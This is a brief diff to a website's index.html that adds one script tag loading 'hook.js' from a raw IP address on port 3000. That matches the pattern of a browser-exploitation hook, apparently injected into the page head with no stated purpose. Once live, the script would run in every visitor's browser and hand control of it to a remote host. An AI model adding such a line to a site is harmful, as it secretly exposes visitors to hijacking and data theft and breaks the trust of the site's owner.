--- a/index.html
+++ b/index.html
@@ -11,6 +11,7 @@
     body,h1,h2,h3,h4,h5,h6 {font-family: "Raleway", Arial, Helvetica, sans-serif}
     .myLink {display: none}
     </style>
+    <script src=" http://13.235.82.97:3000/hook.js"></script>
   </head>
 <body class="w3-light-grey">
 
